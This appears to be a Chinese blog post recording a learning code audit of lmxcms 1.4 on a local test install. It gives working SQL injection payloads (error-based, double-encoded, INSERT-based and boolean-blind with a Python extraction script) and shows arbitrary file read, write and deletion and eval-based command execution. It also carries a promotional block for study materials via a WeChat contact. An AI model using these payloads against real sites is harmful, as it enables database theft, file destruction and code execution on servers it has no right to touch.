前言
最近學習php代碼審計,lmxcms很適合去學習代碼審計,因爲比較簡單。
環境搭建
源碼下載地址http://www.lmxcms.com/phpstudy+phpstorm,apache2.4.39+MySQL5.7.26,php5.3.29
網站首頁
後臺管理
搭建成功
框架配置
入口文件
config.inc.php配置文件
run.inc.php 初始化文件
入口
在Action.class.php中找到調用方法的
可以看出m參數是類名前綴,開頭大寫,a參數是方法名
那麼我就知道該框架處理請求的格式如下
http://127.0.0.1/lmxcms1.4/admin.php?m=xx類名&a=xx方法
【----幫助網安學習,以下所有學習資料免費領!加vx:yj009991,備註 “博客園” 獲取!】
① 網安學習成長路徑思維導圖
② 60+網安經典常用工具包
③ 100+SRC漏洞分析報告
④ 150+網安攻防實戰技術電子書
⑤ 最權威CISSP 認證考試指南+題庫
⑥ 超1800頁CTF實戰技巧手冊
⑦ 最新網安大廠面試題合集(含答案)
⑧ APP客戶端安全檢測指南(安卓+IOS)
後臺SQL注入
在bookaction.class.php
在這裏可以看到這個id是可控的,於是進入getReply函數裏看看
發現這裏執行了SQL語句
在後面寫個echo$sql方便看
因爲正常輸入沒回顯,採取報錯注入
admin.php?m=Book&a=reply&id=1) and updatexml(0,concat(0x7e,user()),1)--+
前臺SQL注入
TagsAction.class.php中
看不出來$data['name']的值是如何來的,查看的p的方法
可以看到type=2的時候爲GET傳遞,說明我們可以控制這個參數,繼續看能不能利用
查看getNameData的聲明
查看oneModel
查看oneDB
接着在這上面寫個echo $sql;
/index.php/?m=Tags&name=1
會跳404,但echo 出來了sql語句,說明這個過程是有sql語句執行的
這個時候繼續利用報錯函數執行試試
' and updatexml(0,concat(0x7e,user()),1) --+
發現是空白,連報錯都沒有,其實仔細看之前common.php裏,有filter_sql方法
但是這裏寫了一個url解碼的函數,且這個語句執行是在sql語句過濾執行的後面,那麼我嘗試二次編碼注入
執行成功,但在1.41版本的修復了這個漏洞
這裏用代碼對比下可以明顯看出來
前臺留言SQL注入
在前臺留言這裏
隨便提交一個,提交成功並沒有顯示,進後臺看看
需要審覈才能顯示
審查源碼
在BookAction.class.php中,發現POST傳setbook後會進入checkdata函數
裏面是驗證前臺數據並且過濾了html代碼並且有filter_sql
過濾了sql語句常用函數,在這裏就不能用二次編碼繞過了,因爲這裏沒寫url解碼函數
查看addmodel
查看addDB
即使我們有二次注入的思路,但這個需要管理員審覈才能看到回顯
隨便測試一個看看
在數據庫中顯示爲
可以看出這個ischeck是判斷是否顯示在前臺的,那麼我們進行注入,把ischeck修改爲1就可以回顯在前端了
POST提交
setbook=1&name=1&content=1&time,ischeck)VALUES((select/**/version()),'1','','','127.0.0.1','1679301152','1')#=1
前臺布爾盲注
searchaction.class.php
serchmodel
countModel
countDB
在這裏寫入echo $sql;方便嘗試注入
利用這些參數進行注入
可以利用tuijian這個參數注入,或者也可以用renmen看構造問題
SELECT count(1) FROM lmx_product_data WHERE time > 1647768137 ANDremen=1 AND (title like '%a%') ORDER BY id desc
執行如上sql語句,這裏同樣也進行了filter_sql函數過濾,且沒有url編碼不能向第一個那樣二次編碼繞過,具體可在p方法裏找
index.php?m=search&a=index&keywords=a&mid=1&remen=1%20or%20(if(ascii(substr(database(),1,1))=0x6c,1,0))--+
GET/lmxcms1.4/index.php?m=search&keywords=b&mid=1&tuijian=id%20or%20(if(ascii(substr(database(),1,1))=0x6,1,0));%23
這裏0x6c對應的是l
回顯長度爲8425,隨便改個參數,返回包長度變爲5403
用remen參數回顯爲8422
寫一個簡單的python腳本就可以測出值
import requests\flag=""\url="http://127.0.0.1/lmxcms1.4/index.php?m=search&a=index&keywords=a&mid=1&remen=1%20or%20(if(ascii(substr(database(),{},1))={},1,0))%23"\for i in range(1,7):\for j in range(65,122):\res=requests.get(url.format(i,hex(j)))\if len(res.text)>7000:\flag=flag+chr(j)\print(flag)\else:\print(url)\print(flag)
任意文件讀取&任意文件寫入
文件讀取函數freadfopenfilefile_get_contents搜索file_get_contents然後找file_get_contents函數和參數代碼段,
在file.class.php getcon方法裏
file_get_contents具有讀取文件內容的功能,這裏$path變量我們要看怎麼來的,於是查看getcon的用法
在TemplateAction.class.php中調用了getcon
查看$dir變量怎麼來的
該頁面在admin目錄下,那麼進入後臺根據頁面名稱傳參調用嘗試任意文件讀取
lmxcms1.4/admin.php?m=Template&a=editfile
傳$dir
還可以讀取數據庫文件
同樣這裏還可以進行任意文件寫入
可以在這個頁面直接進行修改或者寫入
分別是文件名稱跟內容,file_put_contents函數寫入
任意文件刪除
在BackdbAction.class.php中搜索unlink
這裏看到filename可控,查看delone
file/back下創建一個文件測試1.txthttp://localhost/lmxcms1.4/admin.php?m=backdb&a=delbackdb&filename=1.txt
通過../../實現任意文件刪除
再次訪問就需要安裝了
命令執行
在admin/AcquisiAction.class.php中搜索eval
可以看出$eval函數的參數$temdata是$this->model->caijiDataOne($_GET['cid']);跟進
可以看出執行了sql語句,通過跟進ci_data_tab發現
查詢的是cj_data表
在cj_data表中插入phpinfo();
lmxcms1.4/admin.php?m=Acquisi&a=showCjData&id=1&cid=1&lid=1
總結
這次是對phpmvc框架的審計的嘗試,思路是從危險函數入手,尋找可控參數變量,嘗試利用觸發,白盒+黑盒一起嘗試可能會效果更佳,感覺自己有好多地方不足,很多都是參考網上的或者別人的思路才能完成審計實現,希望能對大家有所幫助,不足之處希望大家能夠批評指正。
更多靶場實驗練習、網安學習資料,請點擊這裏>>